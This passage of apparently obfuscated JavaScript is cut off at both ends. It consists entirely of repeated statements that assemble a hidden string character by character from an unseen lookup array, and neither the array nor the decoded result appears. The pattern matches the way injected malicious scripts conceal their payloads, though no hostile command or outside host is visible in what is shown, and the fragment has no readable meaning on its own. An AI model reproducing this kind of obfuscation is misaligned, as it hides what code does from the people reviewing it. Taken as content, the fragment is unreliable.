=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[69];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[69];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[24];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[29];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[23];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[24];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[22];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[47];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[23];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[47];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[47];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[65];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[7];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[47];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[47];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[22];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[24];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[21];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[29];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[21];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[20];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[29];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[6];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[8];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[29];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s